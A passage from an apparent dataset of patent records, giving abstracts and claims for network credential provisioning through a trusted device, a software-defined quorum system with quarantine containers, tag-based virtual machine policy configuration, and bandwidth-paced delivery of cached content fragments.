receiving, by a first computing device, a second identifier associated with a second computing device, wherein the first computing device is associated with a first identifier, wherein the first computing device is connected to a first network, and wherein the reception of the second identifier indicates the second computing device is proximate to the first computing device; transmitting the first identifier and the second identifier to a third computing device, wherein a location of the first computing device is known to the third computing device, and wherein the first computing device is trusted by the third computing device; receiving an authentication message from the third computing device; transmitting a network credential for network access to the second computing device in response to the authentication message; and authenticating the second computing device, wherein the authentication is based on the network credential, and wherein the authentication allows the second computing device to connect to the first network. 2. The method of claim 1, further comprising providing, to the second computing device, network access based on the network credential. 3. The method of claim 2, wherein the network access comprises access to the first network. 4. The method of claim 2, wherein the network access comprises access to a second network. 5. The method of claim 1, wherein the second identifier comprises a media access control (MAC) address. 6. The method of claim 1, wherein the second identifier is associated with subscription information. 7. The method of claim 1, further comprising:
causing a display device to prompt a user for feedback; receiving feedback from the user; and wherein the transmitting the network credential for network access to the second computing device in response to the authentication message comprises transmitting the network credential based on the received feedback. 8. A method comprising:
transmitting, by a first computing device, a first identifier to a second computing device via a first messaging protocol, wherein the first identifier is associated with the first computing device, wherein transmission via the first messaging protocol indicates proximity to the second computing device, wherein the second computing device is associated with a second identifier, wherein the second computing device is connected to a network, wherein the second computing device transmits the first identifier and the second identifier to a third computing device via a second messaging protocol, wherein the location of the second computing device is known by the third computing device, and wherein the second computing device is trusted by the third computing device; receiving a network credential from the third computing device; transmitting the network credential to the second computing device; and accessing the network through the second computing device, wherein the access is based on the network credential. 9. The method of claim 8, further comprising communicating via the second messaging protocol through the accessed network. 10. The method of claim 8, wherein the accessed network is different from a network accessed by a fourth computing device, wherein the fourth computing device is in association with the second computing device. 11. The method of claim 8, wherein the first messaging protocol comprises a protocol complying with a Bluetooth standard. 12. The method of claim 8, wherein the second messaging protocol comprises a protocol complying with a Wi-Fi standard. 13. The method of claim 8, wherein the network credential is based on subscription information associated with the first computing device. 14. The method of claim 8, wherein the second computing device is a set-top box. 15. The method of claim 8, wherein the first computing device is a smart phone. 16. A method comprising:
receiving, by a first computing device, a first identifier and a second identifier from a second computing device, wherein the first identifier is associated with the second computing device, wherein the second identifier is associated with a third computing device, wherein the reception of the first identifier and the second identifier indicates that the second computing device is proximate to the third computing device, wherein the second computing device is connected to a network, wherein the location of the second computing device is known by the first computing device, and wherein the second computing device is trusted by the first computing device; determining whether the second identifier is associated with an authorized device; and responsive to a determination that the second identifier is associated with an authorized device, transmitting an authentication message, wherein the authentication message comprises instructions to allow the third computing device to associate with the second computing device. 17. The method of claim 16, wherein the second identifier comprises a MAC address. 18. The method of claim 16, wherein determining whether the second identifier is associated with an authorized device further comprises retrieving subscription information associated with the second identifier. 19. The method of claim 16, further comprising causing a display device to prompt a user for a selection of a plurality of options for an access decision for the third computing device. 20. The method of claim 19, wherein the plurality of options comprise at least one of deny, allow, and allow with limited access. | Methods and systems are disclosed to enable a user device to gain access to a network via a trusted device (e.g., a network device). 
The network device can obtain a user device identifier from the user device and can transmit the user device identifier along with a network device identifier to a computing device (e.g., a server associated with a service provider). The server can determine if the user device should be permitted to access the network. The server can return the results of the determination to the network device and/or the user device. If the determination is that the user device should be permitted to access the network, the user device can also receive network credentials. The user device can access the network with the network credentials.1. A method comprising:
receiving, by a first computing device, a second identifier associated with a second computing device, wherein the first computing device is associated with a first identifier, wherein the first computing device is connected to a first network, and wherein the reception of the second identifier indicates the second computing device is proximate to the first computing device; transmitting the first identifier and the second identifier to a third computing device, wherein a location of the first computing device is known to the third computing device, and wherein the first computing device is trusted by the third computing device; receiving an authentication message from the third computing device; transmitting a network credential for network access to the second computing device in response to the authentication message; and authenticating the second computing device, wherein the authentication is based on the network credential, and wherein the authentication allows the second computing device to connect to the first network. 2. The method of claim 1, further comprising providing, to the second computing device, network access based on the network credential. 3. The method of claim 2, wherein the network access comprises access to the first network. 4. The method of claim 2, wherein the network access comprises access to a second network. 5. The method of claim 1, wherein the second identifier comprises a media access control (MAC) address. 6. The method of claim 1, wherein the second identifier is associated with subscription information. 7. The method of claim 1, further comprising:
causing a display device to prompt a user for feedback; receiving feedback from the user; and wherein the transmitting the network credential for network access to the second computing device in response to the authentication message comprises transmitting the network credential based on the received feedback. 8. A method comprising:
transmitting, by a first computing device, a first identifier to a second computing device via a first messaging protocol, wherein the first identifier is associated with the first computing device, wherein transmission via the first messaging protocol indicates proximity to the second computing device, wherein the second computing device is associated with a second identifier, wherein the second computing device is connected to a network, wherein the second computing device transmits the first identifier and the second identifier to a third computing device via a second messaging protocol, wherein the location of the second computing device is known by the third computing device, and wherein the second computing device is trusted by the third computing device; receiving a network credential from the third computing device; transmitting the network credential to the second computing device; and accessing the network through the second computing device, wherein the access is based on the network credential. 9. The method of claim 8, further comprising communicating via the second messaging protocol through the accessed network. 10. The method of claim 8, wherein the accessed network is different from a network accessed by a fourth computing device, wherein the fourth computing device is in association with the second computing device. 11. The method of claim 8, wherein the first messaging protocol comprises a protocol complying with a Bluetooth standard. 12. The method of claim 8, wherein the second messaging protocol comprises a protocol complying with a Wi-Fi standard. 13. The method of claim 8, wherein the network credential is based on subscription information associated with the first computing device. 14. The method of claim 8, wherein the second computing device is a set-top box. 15. The method of claim 8, wherein the first computing device is a smart phone. 16. A method comprising:
receiving, by a first computing device, a first identifier and a second identifier from a second computing device, wherein the first identifier is associated with the second computing device, wherein the second identifier is associated with a third computing device, wherein the reception of the first identifier and the second identifier indicates that the second computing device is proximate to the third computing device, wherein the second computing device is connected to a network, wherein the location of the second computing device is known by the first computing device, and wherein the second computing device is trusted by the first computing device; determining whether the second identifier is associated with an authorized device; and responsive to a determination that the second identifier is associated with an authorized device, transmitting an authentication message, wherein the authentication message comprises instructions to allow the third computing device to associate with the second computing device. 17. The method of claim 16, wherein the second identifier comprises a MAC address. 18. The method of claim 16, wherein determining whether the second identifier is associated with an authorized device further comprises retrieving subscription information associated with the second identifier. 19. The method of claim 16, further comprising causing a display device to prompt a user for a selection of a plurality of options for an access decision for the third computing device. 20. The method of claim 19, wherein the plurality of options comprise at least one of deny, allow, and allow with limited access. | 2,400 |
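The three-party credential handoff claimed above (trusted network device, proximate user device, authenticating server) can be sketched in a few Python functions. The authorized-MAC set, function names, and credential format are all assumptions for illustration; the claims do not prescribe how the server's subscription lookup or the credential are implemented.

```python
import secrets

# Assumed stand-in for the server's subscription database (claim 18).
AUTHORIZED_MACS = {"aa:bb:cc:dd:ee:ff"}

def server_authenticate(network_device_id: str, user_device_mac: str) -> dict:
    # Third computing device: the trusted network device's location and
    # identifier are already known, so only the proximate user device's
    # identifier needs checking against subscription information.
    if user_device_mac in AUTHORIZED_MACS:
        return {"allow": True, "credential": secrets.token_hex(16)}
    return {"allow": False, "credential": None}

def network_device_handle(user_device_mac: str, network_device_id: str = "gw-01"):
    # First computing device: receiving the user device's identifier
    # (e.g. over Bluetooth) indicates proximity; both identifiers are
    # forwarded to the server for the access decision.
    result = server_authenticate(network_device_id, user_device_mac)
    # On an affirmative authentication message, pass the credential on
    # to the user device, which then associates with the network.
    return result["credential"] if result["allow"] else None
```

In the claims, the proximity link and the server link use different messaging protocols (e.g. Bluetooth to the user device, Wi-Fi/backhaul to the server); this sketch abstracts both as function calls.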
9,183 | 9,183 | 15,596,363 | 2,494 | A Software Defined Quorum (SDQ) system implements a quorum system using Software Defined Networking (SDN). The SDQ system includes a controller/orchestrator; a plurality of compute/storage devices each comprising a normal container and a quarantine container; and a network communicatively coupling the controller/orchestrator and the plurality of compute/storage devices together; wherein the controller/orchestrator is configured to classify content in the quorum system based on policy attributes, address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. | 1. A Software Defined Quorum (SDQ) system configured to implement a quorum system using Software Defined Networking (SDN), the SDQ system comprising:
a controller/orchestrator; a plurality of compute/storage devices each comprising a normal container and a quarantine container; and a network communicatively coupling the controller/orchestrator and the plurality of compute/storage devices together; wherein the controller/orchestrator is configured to
classify content in the quorum system based on policy attributes,
address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and
address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 2. The SDQ system of claim 1, wherein the network comprises a leaf/spine network with a programmable data plane using SDN, and wherein the plurality of compute/storage devices each implement a Virtual Machine (VM) which hosts the normal container and the quarantine container. 3. The SDQ system of claim 1, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 4. The SDQ system of claim 1, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 5. The SDQ system of claim 1, wherein, to add a new tenant to the quorum system, the controller/orchestrator is configured to
receive the policy attributes from the new tenant, allocate the service tag, the first customer tag, and the second customer tag for the new tenant, and create the normal container and the quarantine container on each of the plurality of compute/storage devices. 6. The SDQ system of claim 1, wherein, to classify the content, the controller/orchestrator is configured to
maintain a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and update or populate the journal based on the policy attributes for the tenant. 7. The SDQ system of claim 1, wherein, for suspicious content, the controller/orchestrator is configured to
address the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of report the suspicious content and provide a sample of the suspicious content for threat intelligence. 8. A controller/orchestrator part of a Software Defined Quorum (SDQ) system configured to implement a quorum system using Software Defined Networking (SDN), the controller/orchestrator comprising:
a network interface communicatively coupled to a network which connects to a plurality of compute/storage devices each comprising a normal container and a quarantine container; one or more processors communicatively coupled to the network interface; and memory storing instructions that, when executed, cause the one or more processors to
classify content in the quorum system based on policy attributes,
address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and
address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 9. The controller/orchestrator of claim 8, wherein the network comprises a leaf/spine network with a programmable data plane using SDN, and wherein the plurality of compute/storage devices each implement a Virtual Machine (VM) which hosts the normal container and the quarantine container. 10. The controller/orchestrator of claim 8, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 11. The controller/orchestrator of claim 8, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 12. The controller/orchestrator of claim 8, wherein, to add a new tenant to the quorum system, the memory storing instructions that, when executed, further cause the one or more processors to
receive the policy attributes from the new tenant, allocate the service tag, the first customer tag, and the second customer tag for the new tenant, and create the normal container and the quarantine container on each of the plurality of compute/storage devices. 13. The controller/orchestrator of claim 8, wherein, to classify the content, the memory storing instructions that, when executed, further cause the one or more processors to
maintain a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and update or populate the journal based on the policy attributes for the tenant. 14. The controller/orchestrator of claim 8, wherein, for suspicious content, the memory storing instructions that, when executed, further cause the one or more processors to
address the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of report the suspicious content and provide a sample of the suspicious content for threat intelligence. 15. A Software Defined Quorum (SDQ) method implemented by a controller/orchestrator using Software Defined Networking (SDN), wherein the controller/orchestrator is communicatively coupled to a plurality of compute/storage devices, each comprising a normal container and a quarantine container, the SDQ method comprising:
classifying content in the quorum system based on policy attributes; addressing content to the plurality of compute/storage devices using a service tag based on networking attributes for the network; and addressing the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 16. The SDQ method of claim 15, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 17. The SDQ method of claim 15, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 18. The SDQ method of claim 15, wherein, to add a new tenant to the quorum system, the SDQ method further comprising:
receiving the policy attributes from the new tenant; allocating the service tag, the first customer tag, and the second customer tag for the new tenant; and creating the normal container and the quarantine container on each of the plurality of compute/storage devices. 19. The SDQ method of claim 15, wherein, to classify the content, the SDQ method further comprising:
maintaining a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and updating or populating the journal based on the policy attributes for the tenant. 20. The SDQ method of claim 15, wherein, for suspicious content, the SDQ method further comprising:
addressing the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of reporting the suspicious content and providing a sample of the suspicious content for threat intelligence. | A Software Defined Quorum (SDQ) system implements a quorum system using Software Defined Networking (SDN). The SDQ system includes a controller/orchestrator; a plurality of compute/storage devices each comprising a normal container and a quarantine container; and a network communicatively coupling the controller/orchestrator and the plurality of compute/storage devices together; wherein the controller/orchestrator is configured to classify content in the quorum system based on policy attributes, address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes.1. A Software Defined Quorum (SDQ) system configured to implement a quorum system using Software Defined Networking (SDN), the SDQ system comprising:
a controller/orchestrator; a plurality of compute/storage devices each comprising a normal container and a quarantine container; and a network communicatively coupling the controller/orchestrator and the plurality of compute/storage devices together; wherein the controller/orchestrator is configured to
classify content in the quorum system based on policy attributes,
address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and
address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 2. The SDQ system of claim 1, wherein the network comprises a leaf/spine network with a programmable data plane using SDN, and wherein the plurality of compute/storage devices each implement a Virtual Machine (VM) which hosts the normal container and the quarantine container. 3. The SDQ system of claim 1, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 4. The SDQ system of claim 1, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 5. The SDQ system of claim 1, wherein, to add a new tenant to the quorum system, the controller/orchestrator is configured to
receive the policy attributes from the new tenant, allocate the service tag, the first customer tag, and the second customer tag for the new tenant, and create the normal container and the quarantine container on each of the plurality of compute/storage devices. 6. The SDQ system of claim 1, wherein, to classify the content, the controller/orchestrator is configured to
maintain a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and update or populate the journal based on the policy attributes for the tenant. 7. The SDQ system of claim 1, wherein, for suspicious content, the controller/orchestrator is configured to
address the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of report the suspicious content and provide a sample of the suspicious content for threat intelligence. 8. A controller/orchestrator part of a Software Defined Quorum (SDQ) system configured to implement a quorum system using Software Defined Networking (SDN), the controller/orchestrator comprising:
a network interface communicatively coupled to a network which connects to a plurality of compute/storage devices each comprising a normal container and a quarantine container; one or more processors communicatively coupled to the network interface; and memory storing instructions that, when executed, cause the one or more processors to
classify content in the quorum system based on policy attributes,
address content to the plurality of compute/storage devices using a service tag based on networking attributes for the network, and
address the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 9. The controller/orchestrator of claim 8, wherein the network comprises a leaf/spine network with a programmable data plane using SDN, and wherein the plurality of compute/storage devices each implement a Virtual Machine (VM) which hosts the normal container and the quarantine container. 10. The controller/orchestrator of claim 8, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 11. The controller/orchestrator of claim 8, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 12. The controller/orchestrator of claim 8, wherein, to add a new tenant to the quorum system, the memory storing instructions that, when executed, further cause the one or more processors to
receive the policy attributes from the new tenant, allocate the service tag, the first customer tag, and the second customer tag for the new tenant, and create the normal container and the quarantine container on each of the plurality of compute/storage devices. 13. The controller/orchestrator of claim 8, wherein, to classify the content, the memory storing instructions that, when executed, further cause the one or more processors to
maintain a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and update or populate the journal based on the policy attributes for the tenant. 14. The controller/orchestrator of claim 8, wherein, for suspicious content, the memory storing instructions that, when executed, further cause the one or more processors to
address the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of report the suspicious content and provide a sample of the suspicious content for threat intelligence. 15. A Software Defined Quorum (SDQ) method implemented by a controller/orchestrator using Software Defined Networking (SDN), wherein the controller/orchestrator is communicatively coupled to a plurality of compute/storage devices, each comprising a normal container and a quarantine container, the SDQ method comprising:
classifying content in the quorum system based on policy attributes; addressing content to the plurality of compute/storage devices using a service tag based on networking attributes for the network; and addressing the content to one of the normal container and the quarantine container in each of the plurality of compute/storage devices using a first customer tag for the normal container and a second customer tag for the quarantine container based on the networking attributes. 16. The SDQ method of claim 15, wherein the service tag is a Service Virtual Local Area Network Identifier (SVID), and wherein the first customer tag and the second customer tag are each a different Customer Virtual Local Area Network Identifier (CVID). 17. The SDQ method of claim 15, wherein the policy attributes are defined by a tenant and determine content type and whether modification is allowed, whether encryption is allowed, whether sampling is allowed for reporting, and associated actions. 18. The SDQ method of claim 15, wherein, to add a new tenant to the quorum system, the SDQ method further comprising:
receiving the policy attributes from the new tenant; allocating the service tag, the first customer tag, and the second customer tag for the new tenant; and creating the normal container and the quarantine container on each of the plurality of compute/storage devices. 19. The SDQ method of claim 15, wherein, to classify the content, the SDQ method further comprising:
maintaining a journal for the content correlating a unique identifier, a tenant, content type, a current customer tag comprising one of the first customer tag and the second customer tag, and updating or populating the journal based on the policy attributes for the tenant. 20. The SDQ method of claim 15, wherein, for suspicious content, the SDQ method further comprising:
addressing the suspicious content with the second customer tag to the quarantine container on each of the plurality of compute/storage devices, and one or more of reporting the suspicious content and providing a sample of the suspicious content for threat intelligence. | 2,400 |
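The SVID/CVID addressing recited in the SDQ claims above can be sketched as follows. This is an illustrative sketch only: the tag values, the `classify` policy check, and the container names are assumptions for the example, not taken from the claims.

```python
# Sketch of the claimed SDQ addressing scheme: content for a tenant is
# replicated to every compute/storage device with a per-tenant service tag
# (SVID), and steered to the normal or quarantine container with one of two
# per-tenant customer tags (CVIDs). All concrete values are hypothetical.

def classify(content, policy_attributes):
    """Classify content as 'normal' or 'suspicious' per tenant policy.
    Here, content types not allowed by the tenant policy are suspicious."""
    allowed = policy_attributes["allowed_content_types"]
    return "normal" if content["type"] in allowed else "suspicious"

def address(content, tenant, devices):
    """Build one tagged frame per compute/storage device (SVID + CVID)."""
    verdict = classify(content, tenant["policy_attributes"])
    normal = verdict == "normal"
    cvid = tenant["cvid_normal"] if normal else tenant["cvid_quarantine"]
    return [
        {"device": d, "svid": tenant["svid"], "cvid": cvid,
         "container": "normal" if normal else "quarantine",
         "payload": content["data"]}
        for d in devices
    ]

tenant = {"svid": 100, "cvid_normal": 10, "cvid_quarantine": 20,
          "policy_attributes": {"allowed_content_types": {"document"}}}
devices = ["dev-a", "dev-b", "dev-c"]

# Suspicious content is addressed with the second customer tag to the
# quarantine container on each device.
frames = address({"type": "executable", "data": b"..."}, tenant, devices)
```

A real SDQ controller would program these tags into the SDN data plane; here they are plain dictionaries so the steering logic is visible.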
9,184 | 9,184 | 15,384,129 | 2,433 | A method of configuring networking, security, and operational parameters of workloads deployed in a virtualized computing environment includes the steps of: storing multiple policies, each defining one of networking, security, or operational parameters, and associating tags to each of the multiple policies, independent of deployment of a virtual computing instance in the virtual computing environment; responsive to a request to perform configuration of a virtual computing instance being deployed, retrieving policies among the stored multiple policies that are associated with same tags as tags contained in the request; generating configuration parameters for data path components in a host machine of the virtual computing instance and for data path components of the virtual computing instance based on the retrieved policies; and transmitting the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters of the virtual computing instance therewith.
storing multiple policies, each defining one of networking, security, or operational parameters, and associating tags to each of the multiple policies, independent of deployment of a virtual computing instance in the virtual computing environment; responsive to a request to perform configuration of a virtual computing instance being deployed, retrieving policies among the stored multiple policies that are associated with same tags as tags contained in the request; generating configuration parameters for data path components in a host machine of the virtual computing instance and for data path components of the virtual computing instance based on the retrieved policies; and transmitting the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters of the virtual computing instance therewith. 2. The method of claim 1, wherein the host machine includes a virtualization layer that supports execution of the virtual computing instance in the host machine, the virtualization layer including a logical switch to which a virtual network interface controller of the virtual computing instance is connected for communication with other computing entities. 3. The method of claim 2, wherein the request includes an identification of a logical port of the logical switch to which the virtual network interface controller is connected, and the configuration parameters are generated based on the retrieved policies and the identification of the logical switch. 4. The method of claim 1, wherein one of the tags is associated with more than one policy. 5. The method of claim 1, wherein the tags contained in the request include a first tag associated with a template of the virtual computing instance and a second tag not associated with the template of the virtual computing instance. 6. 
The method of claim 5, wherein if the policies associated with the first and second tags conflict, the policy associated with the second tag is used instead of the policy associated with the first tag. 7. The method of claim 1, wherein the policies are applied to a distributed firewall. 8. The method of claim 1, wherein the policies are applied to packet flow monitoring. 9. A method of deploying a virtual computing instance for execution in a host machine, wherein policies, each defining configurations of the virtual computing instance, are created in a process independent of the deployment of the virtual computing instance, comprising:
transmitting a first request to instantiate the virtual computing instance to the host machine; specifying a logical port to which the virtual computing instance is to be connected; identifying tags associated with the virtual computing instance; and transmitting a second request to perform network configuration of the virtual computing instance to a network management server, the request including the tags and an identification of the logical port, wherein the network management server, in response to the request, generates network configuration parameters for the virtual computing instance based on the tags, the logical port, and policies which were defined prior to and independent of the first request. 10. The method of claim 9, wherein the tags associated with the virtual computing instance are identified based on tags associated with a template from which the virtual computing instance will be instantiated. 11. The method of claim 10, wherein one of the tags is associated with more than one template. 12. The method of claim 10, wherein one of the templates is associated with more than one tag. 13. The method of claim 10, wherein the tags associated with the virtual computing instance are additionally identified based on inputs made by an administrator. 14. A virtualized computing system comprising:
a host machine having a virtualization layer that supports execution of virtual computing instances; a first management server configured to manage deployment of virtual computing instances on the host; and a second management server configured to perform network configurations of virtual computing instances deployed by the first management server, wherein the second management server stores multiple policies, each defining one of networking, security, or operational parameters, and associates tags to each of the multiple policies and responsive to a request from the first management server to perform configuration of a virtual computing instance being deployed on the host machine: retrieves policies among the stored multiple policies that are associated with same tags as tags contained in the request; generates configuration parameters for data path components in the host machine and for data path components of the virtual computing instance based on the retrieved policies; and transmits the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters of the virtual computing instance therewith. 15. The system of claim 14, wherein the virtualization layer includes a logical switch to which a virtual network interface controller of the virtual computing instance is to be connected for communication with other computing entities. 16. The system of claim 15, wherein the request includes an identification of a logical port of the logical switch to which the virtual network interface controller is connected, and the configuration parameters are generated based on the retrieved policies and the identification of the logical switch. 17. The system of claim 14, wherein the tags contained in the request include a first tag associated with a template of the virtual computing instance and a second tag not associated with the template of the virtual computing instance. 18.
The system of claim 17, wherein if the policies associated with the first and second tags conflict, the policy associated with the second tag is used instead of the policy associated with the first tag. 19. The system of claim 14, wherein the policies are applied to a distributed firewall. 20. The system of claim 14, wherein the policies are applied to packet flow monitoring. | A method of configuring networking, security, and operational parameters of workloads deployed in a virtualized computing environment includes the steps of: storing multiple policies, each defining one of networking, security, or operational parameters, and associating tags to each of the multiple policies, independent of deployment of a virtual computing instance in the virtual computing environment; responsive to a request to perform configuration of a virtual computing instance being deployed, retrieving policies among the stored multiple policies that are associated with same tags as tags contained in the request; generating configuration parameters for data path components in a host machine of the virtual computing instance and for data path components of the virtual computing instance based on the retrieved policies; and transmitting the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters of the virtual computing instance therewith.1. A method of configuring a virtual computing instance for execution in a virtual computing environment, comprising:
storing multiple policies, each defining one of networking, security, or operational parameters, and associating tags to each of the multiple policies, independent of deployment of a virtual computing instance in the virtual computing environment; responsive to a request to perform configuration of a virtual computing instance being deployed, retrieving policies among the stored multiple policies that are associated with same tags as tags contained in the request; generating configuration parameters for data path components in a host machine of the virtual computing instance and for data path components of the virtual computing instance based on the retrieved policies; and transmitting the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters of the virtual computing instance therewith. 2. The method of claim 1, wherein the host machine includes a virtualization layer that supports execution of the virtual computing instance in the host machine, the virtualization layer including a logical switch to which a virtual network interface controller of the virtual computing instance is connected for communication with other computing entities. 3. The method of claim 2, wherein the request includes an identification of a logical port of the logical switch to which the virtual network interface controller is connected, and the configuration parameters are generated based on the retrieved policies and the identification of the logical switch. 4. The method of claim 1, wherein one of the tags is associated with more than one policy. 5. The method of claim 1, wherein the tags contained in the request include a first tag associated with a template of the virtual computing instance and a second tag not associated with the template of the virtual computing instance. 6. 
The method of claim 5, wherein if the policies associated with the first and second tags conflict, the policy associated with the second tag is used instead of the policy associated with the first tag. 7. The method of claim 1, wherein the policies are applied to a distributed firewall. 8. The method of claim 1, wherein the policies are applied to packet flow monitoring. 9. A method of deploying a virtual computing instance for execution in a host machine, wherein policies, each defining configurations of the virtual computing instance, are created in a process independent of the deployment of the virtual computing instance, comprising:
transmitting a first request to instantiate the virtual computing instance to the host machine; specifying a logical port to which the virtual computing instance is to be connected; identifying tags associated with the virtual computing instance; and transmitting a second request to perform network configuration of the virtual computing instance to a network management server, the request including the tags and an identification of the logical port, wherein the network management server, in response to the request, generates network configuration parameters for the virtual computing instance based on the tags, the logical port, and policies which were defined prior to and independent of the first request. 10. The method of claim 9, wherein the tags associated with the virtual computing instance are identified based on tags associated with a template from which the virtual computing instance will be instantiated. 11. The method of claim 10, wherein one of the tags is associated with more than one template. 12. The method of claim 10, wherein one of the templates is associated with more than one tag. 13. The method of claim 10, wherein the tags associated with the virtual computing instance are additionally identified based on inputs made by an administrator. 14. A virtualized computing system comprising:
a host machine having a virtualization layer that supports execution of virtual computing instances; a first management server configured to manage deployment of virtual computing instances on the host; and a second management server configured to perform network configurations of virtual computing instances deployed by the first management server, wherein the second management server stores multiple policies, each defining one of networking, security, or operational parameters, and associates tags to each of the multiple policies and responsive to a request from the first management server to perform configuration of a virtual computing instance being deployed on the host machine: retrieves policies among the stored multiple policies that are associated with same tags as tags contained in the request; generates configuration parameters for data path components in the host machine and for data path components of the virtual computing instance based on the retrieved policies; and transmits the generated configuration parameters to the host machine for the host machine to configure the networking, security, or operational parameters of the virtual computing instance therewith. 15. The system of claim 14, wherein the virtualization layer includes a logical switch to which a virtual network interface controller of the virtual computing instance is to be connected for communication with other computing entities. 16. The system of claim 15, wherein the request includes an identification of a logical port of the logical switch to which the virtual network interface controller is connected, and the configuration parameters are generated based on the retrieved policies and the identification of the logical switch. 17. The system of claim 14, wherein the tags contained in the request include a first tag associated with a template of the virtual computing instance and a second tag not associated with the template of the virtual computing instance. 18.
The system of claim 17, wherein if the policies associated with the first and second tags conflict, the policy associated with the second tag is used instead of the policy associated with the first tag. 19. The system of claim 14, wherein the policies are applied to a distributed firewall. 20. The system of claim 14, wherein the policies are applied to packet flow monitoring. | 2,400 |
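The tag-based policy retrieval in the claims above, including the conflict rule of claims 6 and 18 (on conflict, the policy of the non-template tag is used instead of the template tag's policy), can be sketched as follows. The policy store, tag names, and parameter keys are hypothetical examples, not taken from the claims.

```python
# Sketch of tag-based policy retrieval as recited in the claims: policies are
# stored with tags independent of deployment; a configuration request carries
# tags; matching policies are retrieved and merged, with policies for
# non-template ("second") tags overriding template-tag policies on conflict.

# (tag -> policy) store; each policy sets one or more parameters. Hypothetical.
POLICIES = {
    "web-tier":  {"firewall": "allow-80-443"},   # tag from the VM template
    "pci-scope": {"firewall": "deny-all-log"},   # tag added at deploy time
    "monitored": {"flow_monitoring": "enabled"},
}

def configure(template_tags, extra_tags):
    """Merge policies for all request tags. Extra (non-template) tags are
    applied last, so their policies win any conflict with template tags."""
    params = {}
    for tag in list(template_tags) + list(extra_tags):
        params.update(POLICIES.get(tag, {}))
    return params

# The conflicting "firewall" setting comes from the non-template tag.
cfg = configure(template_tags=["web-tier", "monitored"], extra_tags=["pci-scope"])
```

Ordering the merge rather than raising on conflict mirrors the claimed rule that the second tag's policy simply replaces the first's.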
9,185 | 9,185 | 15,585,590 | 2,456 | Methods and systems are disclosed herein for managing delivery of content fragments to a device in response to a bandwidth determination. In one implementation of the disclosure, when a content player or device requests a content fragment, a local cache may determine a bandwidth or data rate related to transmission of a content fragment from a source to the cache, and send the fragment to the player at a rate corresponding to the determined bandwidth or data rate.
receiving, from a content source, a plurality of content fragments and storing them in a cache; receiving, from a playback device, a request for one of the plurality of content fragments; determining a length of time associated with receipt of the content fragment from the content source; determining a bandwidth associated with transmission of the content fragment based on the determined length of time and a size of the content fragment; and sending, to the playback device, the content fragment at a rate determined in accordance with the determined bandwidth. 2. The method of claim 1, further comprising determining a playback quality associated with the content fragment based on the determined bandwidth. 3. The method of claim 1, wherein sending the content fragment at a rate determined in accordance with the determined bandwidth comprises sending the content fragment at a rate that does not exceed the determined bandwidth. 4. The method of claim 1, wherein determining a bandwidth associated with transmission of the content fragment comprises dividing the size of the content fragment by the determined length of time. 5. The method of claim 1, wherein the content source communicates with the device using HTTP/2 protocol. 6. The method of claim 5, wherein receiving a plurality of content fragments comprises receiving a push promise message from the content source. 7. The method of claim 6, wherein the push promise message comprises the size of each of the one or more content fragments. 8. The method of claim 7, further comprising storing the size of a content fragment as metadata with the corresponding content fragment. 9. A method comprising:
